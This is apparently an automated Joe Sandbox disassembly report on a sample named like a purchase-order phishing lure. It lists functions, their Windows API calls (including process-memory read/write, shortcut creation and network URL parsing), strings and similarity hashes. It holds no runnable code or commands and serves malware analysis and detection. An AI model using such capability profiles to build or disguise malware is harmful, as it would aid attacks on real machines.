Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Destroy$DeleteObjectWindow$Icon
String ID:
API String ID: 4023252218-0
Opcode ID: 187bd120907745c88baacffad0920a9106e1cca1ea6db424662e0a83cd01c53e
Instruction ID: d1816f9fa450f538fb043821254e2bd2cfb9ade9207d957631f6d0e9d50691b6
Opcode Fuzzy Hash: 187bd120907745c88baacffad0920a9106e1cca1ea6db424662e0a83cd01c53e
Instruction Fuzzy Hash: 05015E70300605ABCB20DF65D9D4B2B77A8BF14712B50452AFD04D7346EB38EC48CB69

Function 0046032B Relevance: 7.5, APIs: 5, Instructions: 43windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00460342
GetWindowTextW.USER32(00000000,00000100,00000100), ref: 00460357
MessageBeep.USER32(00000000), ref: 0046036D
KillTimer.USER32(?,0000040A), ref: 00460392
EndDialog.USER32(?,00000001), ref: 004603AB

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 5e0545b8da8baa7cb8324f4116d33f6edaa60507eab9176a587cebaf75a8c25b
Instruction ID: 48c257e0c270193328064fa19c5b46d6a870d8092b70dfec968bdaebd9a60f08
Opcode Fuzzy Hash: 5e0545b8da8baa7cb8324f4116d33f6edaa60507eab9176a587cebaf75a8c25b
Instruction Fuzzy Hash: BE018831500300A7E7209B54DE5DBDB77A8BF44B05F00492EB681A25D0E7F8A584CB55

Function 00455505 Relevance: 7.5, APIs: 5, Instructions: 43windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001101,00000000,?), ref: 00455514
DeleteObject.GDI32(?), ref: 0045564E
DeleteObject.GDI32(?), ref: 0045565C
DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
DestroyWindow.USER32(?,?,?,?,?), ref: 00455678

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: DeleteDestroyObject$IconMessageSendWindow
String ID:
API String ID: 1489400265-0
Opcode ID: fb8346e1cf28bbdc4ad062342734fe1bacbf25b41774fd01ae6266dc65fad9d1
Instruction ID: 68d82c845863845e83b9d92669df32d5d1b96a6c2c0272d07869f65424c05900
Opcode Fuzzy Hash: fb8346e1cf28bbdc4ad062342734fe1bacbf25b41774fd01ae6266dc65fad9d1
Instruction Fuzzy Hash: D9014F703006419BDB10EF65DED8A2A73A9FB44712B40455AFE05DB286DB78EC49CB68

Function 0045551F Relevance: 7.5, APIs: 5, Instructions: 42windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0043343D: InvalidateRect.USER32(?,00000000,00000001), ref: 004334BE

DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
DeleteObject.GDI32(?), ref: 0045564E
DeleteObject.GDI32(?), ref: 0045565C
DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
DestroyWindow.USER32(?,?,?,?,?), ref: 00455678

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
String ID:
API String ID: 1042038666-0
Opcode ID: 920ee65d6839c6288c76afce6441748d32e1b72318fe83d584ccefe2da360159
Instruction ID: 707d1f3050e1f0ff98422ce5efa9f9a4d3559fdafbc0a23101ed238e91bf2869
Opcode Fuzzy Hash: 920ee65d6839c6288c76afce6441748d32e1b72318fe83d584ccefe2da360159
Instruction Fuzzy Hash: B2014B702006419BCB10AF65D9C8A2A33ACAF19322780456AFD05D7242DB28EC498B79

Function 0043315E Relevance: 7.5, APIs: 5, Instructions: 33COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 00433172
StrokeAndFillPath.GDI32(?), ref: 0043318A
StrokePath.GDI32(?), ref: 00433193
SelectObject.GDI32(?,00000000), ref: 004331A4
DeleteObject.GDI32(00000000), ref: 004331BA

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: a89ec47609df172868659220a46891f09f78d761c189f4b7bb4a315096e7830c
Instruction ID: 1b0d13c7bbaa275692c81ef4a4760df4fcf6218f807946f7e03cce85d1463269
Opcode Fuzzy Hash: a89ec47609df172868659220a46891f09f78d761c189f4b7bb4a315096e7830c
Instruction Fuzzy Hash: F7F0A4751052019BD7508F18EC0C70E7FA8FB4F325F04462EEA19932E0DB781546CBAD

Function 004140CF Relevance: 7.5, APIs: 5, Instructions: 24threadCOMMON

Download Yara Rule

APIs

Part of subcall function 00411A35: _doexit.LIBCMT ref: 00411A41

___set_flsgetvalue.LIBCMT ref: 004140E1

Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE

___fls_getvalue@4.LIBCMT ref: 004140EC

Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72

___fls_setvalue@8.LIBCMT ref: 004140FF

Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9

GetLastError.KERNEL32(00000000,?,00000000), ref: 00414108
ExitThread.KERNEL32 ref: 0041410F
GetCurrentThreadId.KERNEL32 ref: 00414115
__freefls@4.LIBCMT ref: 00414135
__IsNonwritableInCurrentImage.LIBCMT ref: 00414148

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
String ID:
API String ID: 132634196-0
Opcode ID: dbe0df41a3d89f03eebcd77cedb8c7fbd95cde8327ee68e759feca9a6a87dff2
Instruction ID: c6f54ac6c47f72d6c6be617d0ab0d95393642b3a08ca47198428750b18cc63fb
Opcode Fuzzy Hash: dbe0df41a3d89f03eebcd77cedb8c7fbd95cde8327ee68e759feca9a6a87dff2
Instruction Fuzzy Hash: EFE0B6318012096B8F0177F28E2A8DF3A2DAD56799B12842EBF10A3112DA6DD9D147AD

Function 00415601 Relevance: 7.5, APIs: 5, Instructions: 23threadCOMMON

Download Yara Rule

APIs

__IsNonwritableInCurrentImage.LIBCMT ref: 00415610

Part of subcall function 00418540: __FindPESection.LIBCMT ref: 0041859B

__getptd_noexit.LIBCMT ref: 00415620
CloseHandle.KERNEL32(?,?,0041566B), ref: 00415634
__freeptd.LIBCMT ref: 0041563B
ExitThread.KERNEL32 ref: 00415643

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: CloseCurrentExitFindHandleImageNonwritableSectionThread__freeptd__getptd_noexit
String ID:
API String ID: 3798957060-0
Opcode ID: d3b08fe511e09ca6ea2d918a54b62a74066439bca0a0e456eaad9824bd7e2a02
Instruction ID: 5ad9b57b40d8b41da6f03c32f2a15b2799e0bbfe2e5ad1689210a27a588f1b2a
Opcode Fuzzy Hash: d3b08fe511e09ca6ea2d918a54b62a74066439bca0a0e456eaad9824bd7e2a02
Instruction Fuzzy Hash: 29E01A31501A1197C2212BB9AC097DE3255AF01F36F944A6EF81A952A0DB6CD98147AD

Function 0041567F Relevance: 7.5, APIs: 5, Instructions: 22threadCOMMON

Download Yara Rule

APIs

Part of subcall function 00411A35: _doexit.LIBCMT ref: 00411A41

___set_flsgetvalue.LIBCMT ref: 00415690

Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE

___fls_getvalue@4.LIBCMT ref: 0041569B

Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72

___fls_setvalue@8.LIBCMT ref: 004156AD

Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9

GetLastError.KERNEL32(00000000,?,00000000), ref: 004156B6
ExitThread.KERNEL32 ref: 004156BD
__freefls@4.LIBCMT ref: 004156D9
__IsNonwritableInCurrentImage.LIBCMT ref: 004156EC

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Value$__decode_pointer$CurrentErrorExitImageLastNonwritableThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
String ID:
API String ID: 1537469427-0
Opcode ID: 99715b5f8e2ff19c7b8f3a2e2e0a417857e73ed83bc070766e6b29f9400adc7a
Instruction ID: 6f4b581ce684dac4bce1a6396b1ab204a3b2196504341234b7a244e47b3a25b0
Opcode Fuzzy Hash: 99715b5f8e2ff19c7b8f3a2e2e0a417857e73ed83bc070766e6b29f9400adc7a
Instruction Fuzzy Hash: 83E0E6308003096BCF0037F29E1A9DF392DAD41389B52841E7E14B2122DE6DD9D1466D

Function 0040AB16 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 423COMMON

Download Yara Rule

Strings

|k, xrefs: 0040AB99
Default, xrefs: 0042EA71

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: _malloc
String ID: Default$|k
API String ID: 1579825452-2254895183
Opcode ID: 7d4b54e2f039ee4215908d8410217bcf631a4cfeabbe095e8d1ce97298a1dede
Instruction ID: 39a525bc613f0e7e9485e4ea944b13d532e73913c0a35fc25f8fa2b96209a7b9
Opcode Fuzzy Hash: 7d4b54e2f039ee4215908d8410217bcf631a4cfeabbe095e8d1ce97298a1dede
Instruction Fuzzy Hash: 51F19F706083018BD714DF25C484A6BB7E5AF85314F64886FF885AB392D738EC55CB9B

Function 0044F0B1 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 377COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 0044F30B

Strings

', xrefs: 0044F24C
[, xrefs: 0044F0F2
h, xrefs: 0044F872

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: _memcmp
String ID: '$[$h
API String ID: 2931989736-1224472061
Opcode ID: b65a2ba19e68ffe8a11284d2d069350b2f2ae6a9059e42b54d6f98484e49560c
Instruction ID: c2eec353cbd26a418970a1643da97c958d9efd09d44d369c5aec2a2e92b02032
Opcode Fuzzy Hash: b65a2ba19e68ffe8a11284d2d069350b2f2ae6a9059e42b54d6f98484e49560c
Instruction Fuzzy Hash: EBE1B3756083858FE725CF28C8807ABBBE1FFC9304F18896EE89587341D7799849CB56

Function 0044F1F5 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 358COMMON

Download Yara Rule

APIs

_strncmp.LIBCMT ref: 0044FB4C

Strings

>, xrefs: 0044F0DB
U, xrefs: 0044FCAF
R, xrefs: 0044FC8C

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: _strncmp
String ID: >$R$U
API String ID: 909875538-1924298640
Opcode ID: 83caccdc30ebaedd60eda3635d3ed4fa95617b34971efb7504fa10d53abc7e5a
Instruction ID: f6794502b7c89560a677b30a08de70cb8bc1b17d125f16f135907c58c8460d8d
Opcode Fuzzy Hash: 83caccdc30ebaedd60eda3635d3ed4fa95617b34971efb7504fa10d53abc7e5a
Instruction Fuzzy Hash: 46E19C745083818FEB25CF29C49076BBBE1EFD9304F28496EE89587381D378E849CB56

Function 0046CDA0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 263comCOMMON

Download Yara Rule

APIs

Part of subcall function 00442C52: _wcslen.LIBCMT ref: 00442C82

CoInitialize.OLE32(00000000), ref: 0046CE18
CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 0046CE31
CoUninitialize.OLE32 ref: 0046CE50

Strings

.lnk, xrefs: 0046CDEB, 0046CE08

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: cf95cfa125c39178dc1728bd48ca6ee468afe444b27fb378bb5b47a8cf5920ff
Instruction ID: 09ec1e36491b9dee8eccbfa157b0fc1a83632a56aae6c10d58f94140378ad3aa
Opcode Fuzzy Hash: cf95cfa125c39178dc1728bd48ca6ee468afe444b27fb378bb5b47a8cf5920ff
Instruction Fuzzy Hash: D3A1ABB5A042019FC704EF64C980E6BB7E9EF88714F14895EF8849B392D735EC45CBA6

Function 00469BED Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 219COMMON

Download Yara Rule

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00469C37

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: _wcslen
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 176396367-557222456
Opcode ID: 6ed3ee7040cf52f7c8cf58c24b37417f7719ae2cfab6dfb5b0d2deafceea8a2b
Instruction ID: 5ec49088f7a0f5eff408c40ec761cfb1cab3d77d8e9f1d748350f88cc39ab646
Opcode Fuzzy Hash: 6ed3ee7040cf52f7c8cf58c24b37417f7719ae2cfab6dfb5b0d2deafceea8a2b
Instruction Fuzzy Hash: 2C818F715183009FC310EF65C88186BB7E8AF85714F408A2FF5959B2A2E778ED45CB9B

Function 0042D2CC Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 204COMMON

Download Yara Rule

APIs

Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734

VariantInit.OLEAUT32(00000000), ref: 0042D2E0
VariantCopy.OLEAUT32(?,?), ref: 0042D2EE
VariantClear.OLEAUT32(00000000), ref: 0042D2FF

Strings

4RH, xrefs: 00409F28

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Variant$ClearCopyInit_malloc
String ID: 4RH
API String ID: 2981388473-749298218
Opcode ID: 4f5dbf7d09d6609eea61bad343ccdb5a393d5a012301d28101c94dc94e671a2c
Instruction ID: 2430bd0654d197d786bc988f6f01769df72c779a088326c60667d263ff95ce9f
Opcode Fuzzy Hash: 4f5dbf7d09d6609eea61bad343ccdb5a393d5a012301d28101c94dc94e671a2c
Instruction Fuzzy Hash: CC913874A083519FC720CF29D480A1AB7E1FF89304F64892EE999DB351D774EC85CB96

Function 004667A7 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 170shareCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012

__wcsnicmp.LIBCMT ref: 0046681A
WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 004668B9

Strings

LPT, xrefs: 00466814
HH, xrefs: 0046696D

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Connection__wcsnicmp_wcscpy_wcslen
String ID: LPT$HH
API String ID: 3035604524-2728063697
Opcode ID: 2945cb5b31277d8c8021d55f3d7ec86f9f5d8a101f6134c00f702d091f19bef7
Instruction ID: 32c7950bcbaa764ae6d62266904c1b9f72d26d84b6ae022b5f72856ccecd4d84
Opcode Fuzzy Hash: 2945cb5b31277d8c8021d55f3d7ec86f9f5d8a101f6134c00f702d091f19bef7
Instruction Fuzzy Hash: 2151D5B16043009FC720EF65C881B1BB7E5AF85704F11491EFA859B382E779ED49C79A

Function 00438A5D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004374AF: WriteProcessMemory.KERNEL32(?,?,00000000,00000000,00000000,?,00461142,?), ref: 004374E2

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00438AB8

Part of subcall function 00437472: ReadProcessMemory.KERNEL32(?,00000000,00000000,?,00000000,00000000,00460C33,?,00000000,?,00000202), ref: 004374A5

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00438B2F
SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 00438BAF

Strings

@, xrefs: 00438BC3

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: MessageSend$MemoryProcess$ReadWrite
String ID: @
API String ID: 4055202900-2766056989
Opcode ID: 95f302c56ad406a71ba46a757bfca5032ac46bd5be6e99a0861c43b96ce9d769
Instruction ID: 682097a2b5231093ce935cfc9f6f49684b756042c0be5430c67da702d62f7190
Opcode Fuzzy Hash: 95f302c56ad406a71ba46a757bfca5032ac46bd5be6e99a0861c43b96ce9d769
Instruction Fuzzy Hash: E6518FB2208304ABD310DB64CC81FEFB7A9EFC9714F04591EFA8597181D678F9498B66

Function 00465D41 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 119networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00465D59
_wcslen.LIBCMT ref: 00465D8E
InternetCrackUrlW.WININET(?,00000000,?,?), ref: 00465D98

Strings

|, xrefs: 00465D6E

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: CrackInternet_memset_wcslen
String ID: |
API String ID: 915713708-2343686810
Opcode ID: 49a329c21d3e2b60aa9c34259f3774bde857317d5b4f329263fe64f76368b085
Instruction ID: 59fb16093b155e5aebf0565036b17e76eaaa1a90c891d08183ce313382d628e9
Opcode Fuzzy Hash: 49a329c21d3e2b60aa9c34259f3774bde857317d5b4f329263fe64f76368b085
Instruction Fuzzy Hash: AE417EB2754301ABD204EF69DC81B9BF7E8FB88714F00052EF64593290DB75E909CBA6

